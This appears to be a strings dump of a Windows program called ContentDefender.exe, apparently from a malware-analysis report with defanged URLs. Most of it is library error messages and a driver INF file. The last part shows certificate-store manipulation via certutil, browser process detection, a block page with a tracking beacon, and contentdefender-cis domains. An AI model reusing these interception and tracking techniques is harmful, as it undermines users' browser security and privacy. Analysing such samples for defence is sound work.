5Maximum length (%d) of GTRID exceeded - %d (NOE18/TX)5Maximum length (%d) of BQUAL exceeded - %d (NOE19/TX)@Maximum length (%d) of transaction name exceeded - %d (NOE20/TX)@Too many close braces in names file after alias [%s] (NOE105/DB)0[%s] is not a callable PL/SQL object (NOE130/SP)2[%s, #%d] is not found in [%s] package (NOE134/SP)TParameter with type TABLE OF BOOLEAN/RECORD not supported (use TADQuery) (NOE135/SP)KParameter with type RECORD must be of named type (use TADQuery) (NOE142/SP))Cannot convert Oracle Number [%s] to TBcd7DBMS_PIPE event alerter supports only single event name9Cannot start a trace session, when there is an active one"Stored procedure [%s] is not founduArray-typed variable [%s] dimensions [%d] are not supported.
Only sigle dimensional simple type arrays are supportedqArray-typed variable [%s] unsupported element type [%d].
Only sigle dimensional simple type arrays are supportedCArray-typed variable [%s] item index [%d] is out of bounds [%d, %d]
Cannot describe type [%d].
Possible reason: uADCompScriptCommands unit is not linked to the application`No script to execute for [%s].
Possible reason: SQLScriptFileName and SQLScripts both are empty Connection parameter [%s] must be not empty|DbExpress driver configuration file [%s] is not found.
Possible reason: dbExpress is not properly installed on this machineUUnsupported MySQL version [%d].
Supported are client and server from v 3.20 to v 6.2
Port number cannot be changed&Error in parameter [%s] definition. %sFFailed to initialize embedded server.
See MySQL log files for details/Variable [%s] C data type [%d] is not supported
No cursors availableCCannot initialize OCI with character set [%s].
Possible reason: %s1Cannot assign value to BFILE/CFILE parameter [%s]HNo cursor parameters are defined. Include fiMeta into FetchOptions.Items9OCI is not properly installed on this machine (NOE1/INIT)ZUnsupported OCI library [%s] version [%s].
At least version 8.0.3 is required (NOE2/INIT)0Bad or undefined variable param type (NOE12/VAR)
#Cannot read RAW data of [%s] object
Class [%s] is not registered
Unknown storage format [%s]"Cannot move file [%s] to [%s].
%s!Invalid date interval format [%s]Ênnot execute host command [%s].
%s)String size must be of 1 character length.Character cannot be alphanumeric or whitespace
Invalid command [%s] syntax-ACCEPT statement must specify a variable name,DEFINE requires a value following equal sign
VARIABLE has missed right brace"VARIABLE has unsupported data typeÊnnot execute command. Not logged on
=Text field [%s] size is undefined in Fixed Size Record format"Text field [%s] name is Duplicated5Bad text value [%s] format for mapping item [%s].
%s?Undefined source field or expression for destination field [%s]
Timeout expired"Cannot get access to BLOB raw datahVariable length data parameter [%s] overflow.
Value length - [%d], parameter data maximum length - [%d]PCannot perform nonblocking action, while other nonblocking action is in progress
Macro [%s] is not found7Parameter [%s] value index [%d] is out of range [0..%d]mCannot acquire item (connection) from pool.
Maximal number [%d] of simultaneous items (connections) reached.@.
To register it, you can drop component [%s] into your project>.
To register it, you can include unit [%s] into your project
Cannot read [%s] property
Cannot read [%s] object
&Command [%s] must be in inactive state*Dataset [%s] must be in cached update moderConnection is not defined for [%s].
Connection [%s] must be online
Table adapter [%s] cannot be assigned to [%s], because it is
already assigned to [%s] and cannot be shared across few datasets6Dataset connection does not match to called connection Table [%s] must have primary keyWLocal SQL engine misusage by [%s].
Hint: activate connection before activating dataset=Table [%s] index [%s] must be existing non-expressional index
Dataset name must be not empty?Dataset name [%s] must be unique across Local SQL [%s] datasets
Text field [%s] is not found
record has been changed/deleted by another user<Operation cannot be performed without assigned SelectCommand
ADManager must be active#Connection name [%s] must be unique Connection [%s] must be inactive
Connection [%s] must be active)Connection [%s] establishment is canceled
Connection [%s] cannot be pooled.
Possible reason: connection definition is not in the ADManager.ConnectionDefs list or
TADConnection.Params has additional parameters
Connection [%s] is not found
Possible reason: [%s] ConnectionName property is misspelled or references to nonexistent connection$Command [%s] must be in active state
&Column [%s] data type is not supported
Param [%s] type changed from [ft%s] to [ft%s]. Query must be reprepared.
Possible reason: an assignment to a TADParam.AsXXX property implicitly changed the parameter data type.
Hint: use the TADParam.Value or appropriate TADParam.AsXXX property1A meta data argument [%s] value must be specified
Expected number of parameters is [%d], but actual number is [%d].
Possible reason: a parameter was added or deletedsData too large for variable [%s]. Max len = [%d], actual len = [%d]
Hint: set the TADParam.Size to a greater value
Database [%s] does not exist
Access 2003 or earlier: hXXp://support.microsoft.com/kb/239114
Access 2007: hXXp://VVV.microsoft.com/download/en/details.aspx?displaylang=en&id=23734
Access 2010: hXXp://VVV.microsoft.com/download/en/details.aspx?id=13255{JRO.JetEngine class is missing on client machine.
Hint: install latest engine from: hXXp://support.microsoft.com/kb/239114aDatabase format is not recognized.
Possible reason: DBVersion value mismatches database version.&Specified database password is invalid
Unknown OLE error1To perform operation DriverLink must be specified To perform operation service must be activeGCannot deinstall a SQLite collation, while there are active connections?%s command %s [%d] instead of [1] record.
Possible reasons: %s
Connection must be inactive*Too many login retries. Allowed [%d] times1To perform operation driver manager, must be [%s]
Character [%s] is missed
Too long identifier (> 255)6Parameter [%s] ArraySize [%d] is less than ATimes [%d]=Cannot perform action, because previous action is in progress%Escape function [%s] is not supported8Define(mmReset) is only supported for metainfo retrieval6Cannot generate update query. WHERE condition is empty4Cannot generate update query. Update table undefined
Cannot parse object name - [%s])Syntax error in escape function [%s].
%shADPhysManager shutdown timeout.
Possible reason: application has not released all connection interfaceszParameter [%s] data type is unknown.
Hint: specify TADParam.DataType or assign TADParam value before Prepare/Execute call)Parameter [%s] data type is not supported
Set TADConnection.DriverName or add DriverID to your connection definition
Capability is not supported
Transaction [%s] must be activeCTransaction [%s] must be inactive. Nested transactions are disabled
Hint: use Execute / ExecSQL method for non-SELECT commands!Command must be is prepared state]Cannot execute command returning result sets.
Hint: use Open method for SELECT-like commands!Command must be open for fetching,Exact %s [%d] rows, while [%d] was requested
Meta information mismatchvCannot load vendor library [%s].
%sHint: check it is in the PATH or application EXE directories, and has x86 bitness./Cannot get vendor library entry point[s].
Record editing for dataset [%s] is disabled-Record inserting for dataset [%s] is disabled,Record deleting for dataset [%s] is disabled=Field [%s] specified within %s of DataSet [%s] does not existeCannot set dataset [%s] to offline mode.
Hint: check that FetchOptions.AutoFetchAll is not afDisable|Cannot turn off cached updates mode for DataSet [%s].
Hint: dataset has updated rows, cancel or apply updates before action.Cannot make definition [%s] circular reference7Cannot %s definition [%s]. It has associated connection!Cannot make definition persistent9Cannot load definition list, because it is already loaded$Definition [%s] is not found in [%s]"Definition name [%s] is duplicated"Driver [%s] is not registered.
%sXDriver [%s] cannot be released.
Hint: Close all TADConnection objects and release poolsNTo register it, you can drop component [TADPhys%sDriverLink] into your project5Correct driver ID or define [%s] virtual driver in %s
>Operation cannot mix aggregate value with record-varying value
%s&Bookmark is not found for dataset [%s]
View [%s] is not a sorted view"Adapter interface must be suppliedUCannot set MasterSource for dataset [%s].
Nested datasets cannot have a MasterSourceMCannot set MasterSource for dataset [%s].
Circular datalinks are not alloweduCannot refresh dataset [%s].
Cannot open dataset [%s].
Hint: if that is TADMemTable, use CreateDataSet or CloneCursor to open dataset(Index [%s] is not found for dataset [%s],Aggregate [%s] is not found for dataset [%s]6Index [%s] definition is not complete for dataset [%s]:Aggregate [%s] definition is not complete for dataset [%s]7Cannot perform operation on unidirectional dataset [%s]LBookmark key fields [%s] are incompatible
with dataset [%s] key fields [%s]
uColumn or function [%s] is not found.
Invalid use of keyword
Invalid character found [%s]
'(' expected but [%s] found"')' or ',' expected but [%s] found
')' expected but [%s] found"IN predicate list may not be empty
Expected [%s].Arithmetic in filter expressions not supported
&Cannot perform operation for row state4Cannot change updates registry for DatS manager [%s]"Too many aggregate values per view9Grouping level exceeds maximum allowed for aggregate [%s]XVariable length column [%s] overflow.
Value length - [%d], column maximum length - [%d]
Invalid foreign key [%s]
Invalid unique key [%s]#Cannot change column [%s] data type
Invalid relation [%s](Cannot create parent view. Relation [%s]7Cannot change table [%s] structure, when table has rows;Found a cascading actions loop at checking foreign key [%s]
Record is not lockedFAssigning value [%s] is not compatible with column [%s] data type.
%s,Value [%s] is out of range of [%s] data type
Column [%s] is read only
Cannot insert row into table"Column [%s] value must be not null4Duplicate row found on unique index. Constraint [%s]/Cannot process - no parent row. Constraint [%s]2Cannot process - child rows found. Constraint [%s]
Cannot compare rowsÚta type conversion is not supported
Column [%s] is not searchable=Row may have only single column of [dtParentRowRef] data typewCannot read data from or write data to the invariant column [%s].
Row is not nested)Column [%s] is not reference to other row'Column [%s] is not reference to row set
%s is not a valid BCD value
Invalid format type for BCD$Could not parse SQL TimeStamp string
Invalid SQL date/time values
FireDAC Login#Name [%s] is duplicated in the list
Object [%s] is not found(Column [%s] type is unknown or undefined
Constraint [%s]
Cannot begin edit row'Cannot create child view. Relation [%s]
Cannot delete row Column [%s] must have blob value_Fixed length column [%s] data length mismatch.
Value length - [%d], column fixed length - [%d]
0Cannot perform this operation on an open dataset"Dataset not in edit or insert mode1Cannot perform this operation on a closed dataset1Cannot perform this operation on an empty dataset!Cannot modify a read-only dataset#Nested dataset must inherit from %s
Parameter '%s' not found
Unable to load bind parameters$Field '%s' is of an unsupported type
SQL not supported: %s
Execute not supported: %s1Operation not allowed on a unidirectional dataset
0'%s' is not a valid integer value for field '%s'0'%s' is not a valid boolean value for field '%s'7'%s' is not a valid floating point value for field '%s'6Type mismatch for field '%s', expecting: %s actual: %s6Size mismatch for field '%s', expecting: %d actual: %d Invalid variant type or size for field '%s'#Value of field '%s' is out of range
Field '%s' must have a value
Field '%s' has no dataset1Field '%s' cannot be a calculated or lookup field
Field '%s' cannot be modified
No index currently active0Field '%s' is not indexed and cannot be modified"Circular datalinks are not allowed/Lookup information for field '%s' is incomplete
No help keyword specified.
Invalid FieldKind Field '%s' is of an unknown type
Duplicate field name '%s'
Field '%s' not found#Cannot access field '%s' as type %s
Invalid value for field '%s'E%g is not a valid value for field '%s'. The allowed range is %g to %gE%s is not a valid value for field '%s'. The allowed range is %s to %s
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Alt Clipboard does not support Icons/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Invalid MMF name "%s"*The MMF named "%s" cannot be created empty
Win32 error: %s (%u)%s%s
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Unsupported clipboard format
128-Byte PrefetchingeCPUID leaf 2 does not report cache descriptor information, use CPUID leaf 4 to query cache parameters
Windows 8.1
Windows Server 2012 R2
(Failed to get ANSI replacement character#Unable to open key "%s\%s" for read$Unable to open key "%s\%s" for write0Unable to open key "%s\%s" and access value "%s"#"%s\%s\%s" is of wrong kind or size
"%s" does not match RootKey
bClient policy does not allow credential delegation to target server with NLTM only authentication.1The recipient rejected the renegotiation request.-The required security context does not exist.`The PKU2U protocol encountered an error while attempting to utilize the associated certificates.:The identity of the server computer could not be verified.
Unknown error#SSPI %s returns error #%d(0x%x): %s0SSPI interface has failed to initialise properly
Unknown credentials use!Do AcquireCredentialsHandle first"CompleteAuthToken is not supported
Invalid stream operation
5The certificate is not valid for the requested usage.
The smartcard certificate used for authentication has been revoked. Please contact your system administrator. There may be additional information in the event log.
An untrusted certificate authority was detected While processing the smartcard certificate used for authentication. Please contact your system administrator.
The revocation status of the smartcard certificate used for authentication could not be determined. Please contact your system administrator.lThe smartcard certificate used for authentication was not trusted. Please contact your system administrator.hThe smartcard certificate used for authentication has expired. Please contact your system administrator.
The Kerberos subsystem encountered an error. A service for user protocol request was made against a domain controller which does not support service for user.
An attempt was made by this server to make a Kerberos constrained delegation request for a target outside of the server's realm. This is not supported, and indicates a misconfiguration on this server's allowed to delegate to list. Please contact your administrator.
The revocation status of the domain controller certificate used for smartcard authentication could not be determined. There is additional information in the system event log. Please contact your system administrator.
An untrusted certificate authority was detected while processing the domain controller certificate used for authentication. There is additional information in the system event log. Please contact your system administrator.
The domain controller certificate used for smartcard logon has expired. Please contact your system administrator with the contents of your system event log.
The domain controller certificate used for smartcard logon has been revoked. Please contact your system administrator with the contents of your system event log.IA signature operation must be performed before the user can authenticate.AOne or more of the parameters passed to the function was invalid.DClient policy does not allow credential delegation to target server.
9The number of maximum ticket referrals has been exceeded.KThe local machine must be a Kerberos KDC (domain controller) and it is not.qThe other end of the security negotiation is requires strong crypto but it is not supported on the local machine.5The KDC reply contained more than one principal name.OExpected to find PA data for a hint of what etype to use, but it was not found.
The client certificate does not contain a valid UPN, or does not match the client name in the logon request. Please contact your administrator.-Smartcard logon is required and was not used.!A system shutdown is in progress.'An invalid request was sent to the KDC.DThe KDC was unable to generate a referral for the service requested.:The encryption type requested is not supported by the KDC.QAn unsupported preauthentication mechanism was presented to the Kerberos package.
The requested operation cannot be completed. The computer must be trusted for delegation and the current user account must be configured to allow delegation.7Client's supplied SSPI channel bindings were incorrect.9The received certificate was mapped to multiple accounts.
SEC_E_NO_KERB_KEY
'The target principal name is incorrect.:There is no LSA mode context associated with this context.8The clocks on the client and server machines are skewed.;The certificate chain was issued by an untrusted authority.7The message received was unexpected or badly formatted.;An unknown error occurred while processing the certificate.%The received certificate has expired.*The specified data could not be encrypted.*The specified data could not be decrypted.YThe client and server cannot communicate, because they do not possess a common algorithm.
The security context could not be established due to a failure in the requested quality of service (e.g. mutual authentication or delegation).dA security context was deleted before the context was completed. This is considered a logon failure.mThe client is trying to negotiate a context and the server requires user-to-user but didn't send a TGT reply.aUnable to accomplish the requested task because the local machine does not have any IP addresses.bThe supplied credential handle does not match the credential associated with the security context.]The crypto system or checksum function is invalid because a required function is unavailable.
;The credentials supplied to the package were not recognized4No credentials are available in the security packageCThe message or signature supplied for verification has been altered8The message supplied for verification is out of sequence3No authority could be contacted for authentication.UThe function completed successfully, but must be called again to complete the contextEThe function completed successfully, but CompleteToken must be calledtThe function completed successfully, but both CompleteToken and this function must be called to complete the contextsThe logon was completed, but no network authority was available. The logon was made using locally known information-The requested security package does not exist2The context has expired and can no longer be used.DThe supplied message is incomplete. The signature was not verified.lThe credentials supplied were not complete, and could not be verified. The context could not be initialized.1The buffers supplied to a function was too small.
The handle specified is invalid'The function requested is not supported.The specified target is unknown or unreachable0The Local Security Authority cannot be contacted-The requested security package does not exist6The caller is not the owner of the desired credentialsBThe security package failed to initialize, and cannot be installed-The token supplied to the function is invalid^The security package is not able to marshall the logon buffer, so the logon attempt has failedNThe per-message Quality of Protection is not supported by the security package?The security context does not allow impersonation of the client
Failed to load %s.
SSL status: "%s"
%s Alert
%s Read Alert
%s Write Alert
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Host field is empty,Character Index %d out of Range, Length = %d:Character at Index %d is not a valid UTF-16 High Surrogate9Character at Index %d is not a valid UTF-16 Low Surrogate
Transparent proxy cannot bind. UDP Not supported by this proxy.$Buffer terminator must be specified.!Buffer start position is invalid.
Reply Code is not valid: %s
Reply Code already exists: %s
IOHandler value is not valid'Algorithm %s not permitted in FIPS mode
Unknown Protocol(Request method requires HTTP version 1.1KUnsupported hash algorithm. This implementation supports only MD5 encoding.$Error accepting connection with SSL.
Address type not supported."%s: Circular links are not allowed"Not enough data in buffer. (%d/%d)
File "%s" not found
Object type not supported.
Set Size Exceeded.)UDP is not support in this SOCKS version.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Command not supported.
Stack already created.1Only one TIdAntiFreeze can exist per application.&Cannot change IPVersion when connected$Can not bind in port range (%d - %d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Invalid Port Range (%d - %d)
%s is not a valid service.
%s is not a valid IPv6 address:The requested IPVersion / Address family is not supported.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
Invalid destination index (%d)
Invalid codepage (%d)4Failed attempting to retrieve time zone information.-Error on call to Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Socket Error # %d
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Invalid destination array"Character index out of bounds (%d)
Invalid count (%d)
Invalid property type: %s
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to create key %s
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property element: %s
Ancestor for '%s' not found
Cannot assign a %s to a %s
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp
'%s' is not a valid GUID value
I/O error %d
The OpenSSL Project, hXXp://VVV.openssl.org/
1.0.1g
ClassGUID={4d36e96c-e325-11ce-bfc1-08002be10318}
LayoutFile=layout.inf
DriverVer=07/01/2001,5.1.2535.0
Include=ks.inf
Needs=KS.Registration
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation
RegisterDlls=BDA.RegisterDlls
CopyFiles=BdaPlugIn.Files, BdaFilter.Files, BdaDriver.Files
[DefaultInstall.NT]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration,BDA.DeviceInstallation, NdisIP.Installation.NT
BdaFilter.Files=11
BdaPlugIn.Files=11
AllDll.Files=11
BdaDriver.Files=10,system32\drivers
AllDriver.Files=10,system32\drivers
[BDA.Registration]
AddReg=BDA.PluginRegistration, BDA.CategoryRegistration, BDA.NodeRegistration, BDA.PinNameRegistration, BDA.FilterRegistration
[BDA.Installation]
[BDA.Installation.NT]
[BDA.CategoryRegistration]
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,FriendlyName,,Êtegory_BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaTuner%,CLSID,,%GUID.BdaTuner%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,FriendlyName,,Êtegory_BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,CLSID,,%GUID.BdaComponent%
HKCR,¬tiveMovieCategories%\%GUID.BdaComponent%,Merit,1,00,00,60,00
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,FriendlyName,,Êtegory_BdaRenderer%
HKCR,¬tiveMovieCategories%\%GUID.BdaRenderer%,CLSID,,"%GUID.BdaRenderer%"
[BDA.NodeRegistration]
; HKLM,%MediaCategories%\%GUID.Bridge%,Name,,%Node.Bridge%
; HKLM,%MediaCategories%\%GUID.Bridge%,Display,1,00,00,00,00
[BDA.PinNameRegistration]
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Name,,%Pin.Name.AtscTS%
HKLM,%MediaCategories%\%PinID.GUID.AtscTS%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Name,,%Pin.Name.IPV4%
HKLM,%MediaCategories%\%PinID.GUID.IPV4%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Name,,%Pin.Name.MPE%
HKLM,%MediaCategories%\%PinID.GUID.MPE%,Display,1,00,00,00,00
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Name,,%Pin.Name.NABTS%
HKLM,%MediaCategories%\%PinID.GUID.NABTS%,Display,1,00,00,00,00
[BDA.DeviceInstallation]
HKLM,%RunOnce%,"MPE0",,"rundll32.exe streamci,StreamingDeviceSetup %MPE.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\mpe.inf,BDAcodec"
HKLM,%RunOnce%,"STREAMIP0",,"rundll32.exe streamci,StreamingDeviceSetup %StreamIP.DeviceId%,GLOBAL,%GUID.BdaRenderer%,%\streamip.inf,BDAcodec"
HKLM,%RunOnce%,"SLIP0",,"rundll32.exe streamci,StreamingDeviceSetup %Slip.DeviceId%,GLOBAL,%GUID.BdaComponent%,%\slip.inf,VBIcodec"
HKLM,%RunOnce%,"CCDECODE0",,"rundll32.exe streamci,StreamingDeviceSetup ÌDecode.DeviceId%,GLOBAL,%VBIcatID%,%\CCDECODE.inf,CCDECODE.Interface.Install"
HKLM,%RunOnce%,"NABTSFEC0",,"rundll32.exe streamci,StreamingDeviceSetup %NabtsFEC.DeviceID%,GLOBAL,%VBIcatID%,%\NABTSFEC.inf,NABTSFEC.Interface.Install"
HKLM,%RunOnce%,"WSTCODEC0",,"rundll32.exe streamci,StreamingDeviceSetup %WSTCodec.DeviceId%,GLOBAL,%VBIcatID%,%\WSTCODEC.inf,WSTCODEC.Interface.Install"
[NdisIP.Installation]
[NdisIP.Installation.NT]
HKLM,%RunOnce%,"NDISIP0",,"rundll32.exe streamci,StreamingDeviceSetup %NdisIP.DeviceId%,NDISIP,%NdisIP.GUID.BDANetInterface%,%\ndisip.inf,NdisIP.Reg"
[BDA.FilterRegistration]
HKLM,%PsisDecd.Reg%,"VendorID",1,31,11,00,00
HKLM,%PsisDecd.Reg%,"AdapterID",1,46,71,00,00
HKLM,%PsisDecd.Reg%,"ChannelNumber",1,0a,00,00,00
HKLM,%PsisDecd.Reg%,"MaxChannelNumber",1,44,00,00,00
HKLM,%PsisDecd.Reg%,"AtscNetwork",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"EnableAtsc_PSIP",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"DvbNetwork",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableDVB_SI",1,00,00,00,00
HKLM,%PsisDecd.Reg%,"EnableNetwkProvider",1,01,00,00,00
HKLM,%PsisDecd.Reg%,"GraphFile",,"\\psistest.grf"
[BDA.RegisterDlls]
11,,BdaPlgin.ax,1
11,,MsDvbNp.ax,1
11,,Mpeg2Data.ax,1
11,,PsisRndr.ax,1
11,,PsisDecd.dll,1
[BDA.PluginRegistration]
HKCR,CLSID\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaDeviceControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaDeviceControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,,,BdaPlgin.ax
HKCR,CLSID\%GUID.BdaPinControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,,,%PlugIn_BdaDevice%
HKLM,%MediaInterfaces%\%GUID.BdaPinControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
HKCR,CLSID\%GUID.BdaCAControl%,,,%PlugIn_BdaDevice%
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,,,CaPlgin.ax
HKCR,CLSID\%GUID.BdaCAControl%\InprocServer32,ThreadingModel,,Both
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,,,%PlugIn_BdaCA%
HKLM,%MediaInterfaces%\%GUID.BdaCAControl%,IID,1,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
[BdaDriver.Files]
BdaSup.sys,,,COPYFLG_NO_VERSION_DIALOG
[BdaFilter.Files]
MSDvbNP.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisRndr.ax,,,COPYFLG_NO_VERSION_DIALOG
PsisDecd.dll,,,COPYFLG_NO_VERSION_DIALOG
[BdaPlugIn.Files]
BdaPlgIn.ax,,,COPYFLG_NO_VERSION_DIALOG
; Bda.TXT is appended here
RunOnce="SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
ActiveMovieCategories="CLSID\{da4e3da0-d07d-11d0-bd50-00a0c911ce86}\Instance"
PsisDecd.Reg="SOFTWARE\Intel\PSIS\PSIS_DECODER"
; Note that some category GUIDs are defined in ks.inf
VBIcatID="{07DAD660-22F1-11d1-A9F4-00C04FBBDE8F}"
GUID.BdaTuner="{71985F48-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaComponent="{FD0A5AF4-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaRenderer= "{71985F4A-1CA1-11d3-9CC8-00C04F7971E0}"
GUID.BdaDeviceControl="{FD0A5AF3-B41D-11d2-9C95-00C04F7971E0}"
GUID.BdaPinControl="{0DED49D5-A8B7-4d5d-97A1-12B0C195874D}"
GUID.BdaCAControl="{B0693766-5278-4ec6-B9E1-3CE40560EF5A}"
GUID.IPSinkPlugin="{3F4DC8E2-4050-11d3-8F4B-00C04F7971E2}"
NdisIP.GUID.BDANetInterface = "{9aa4a2cc-81e0-4cfd-802f-0f74526d2bd3}"
MPE.DeviceId="{8E60217D-A2EE-47f8-B0C5-0F44C55F66DC}"
Slip.DeviceID="{03884CB6-E89A-4deb-B69E-8DC621686E6A}"
StreamIP.DeviceId="{D84D449B-62FB-4ebb-B969-5183ED3DFB51}"
NdisIP.DeviceID="{48926476-2cae-4ded-a86e-73ddebed6779}"
CCDecode.DeviceId="{562370a8-f8dd-11d2-bc64-00a0c95ec22e}"
NabtsFEC.DeviceID="{07DAD662-22F1-11d1-A9F4-00C04FBBDE8F}"
WSTCodec.DeviceId="{70BC06E0-5666-11d3-A184-00105AEF9F33}"
; Note that some pin and filter name GUIDs are defined in ks.inf
PinID.GUID.IPV4="{3fdffa70-ac9a-11d2-8f17-00c04f7971e2}"
PinID.GUID.MPE="{C1B06D73-1DBB-11d3-8F46-00C04F7971E2}"
PinID.GUID.NABTS="{FB6C4286-0353-11d1-905F-0000C0CC16BA}"
PinID.GUID.AtscTS="{78216A81-CFA8-493e-9711-36A61C08BD9D}"
; Note that some categorys are defined in ks.inf
; Note that some pin and filter names are defined in ks.inf
Pin.Name.AtscTS="MPEG2
Pin.Name.IPV4="IPv4"
Pin.Name.MPE="MPE"
Pin.Name.NABTS="NABTS"
()* ,|-.
ContentDefender.exe_304:
.text
`.rdata
@.data
.rsrc
@.reloc
w%s(
?%u4W
Certificate name reading failed
Certificate %s, Is our: %s
Certificate deleted
Certificate deletion failed
Store %s opening %s
Check folder for certificate:
cert8.db
Can't open category key
For category %s enable %s detected
----------------- Domains in category %s-----------------
Category %s enabled: %s
TCP rule setup failed
Invalid JSON array: %c%c%c%c
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
{"level":"%u","type":"%u","process":"ContentDefender","text":"%s","os":"Windows %u.%u %u bit",
Content-type:application/x-www-form-urlencoded; charset=utf8
Checking for process id: %u
Process with id %u recognized as %s
%s %u.%u
opera
firefox
https
Request URL is empty
getLink src URL opening failed
HTTP/1.1
Code detected as error: %s
key opening failure
HTTP/1.1 204 No Content
ConDefSetup.exe
Content type for endpoint %u is %s
url: %s code: %s
{"os":"Windows %u.%u",
"%s",
Content-type:application/x-www-form-urlencoded
Looking for certificate
\Content Defender\nss\certutil.exe -D -n "ContentDefender 2" -d
Looking for certificate in folders
\Content Defender\cert
Cleaning certificate folder
Certificate parsing error
2.5.4.3
Certificate Name is
/version/%uu
cert
FAdvapi32.dll
RegOpenKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
FRegDeleteKeyExA
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}
HTTP/1.1 404 Not OK
<html><body bgcolor=#f0f0f0><center><h1>Web Content Blocked by Content Defender</h1></center><script type="text/javascript">new Image().src ='//contentdefender-cis5.org/blockedpage/log/?' Math.random();</script></body></html>" <!-- - Unfortunately, Microsoft has added a clever new - 'feature' to Internet Explorer. If the text of - an error's message is 'too small', specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - 'smart error messages'. That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
Mscoree.dll
hXXp://contentdefender-cis1.org
hXXp://contentdefender-cis2.org
hXXp://contentdefender-cis3.org
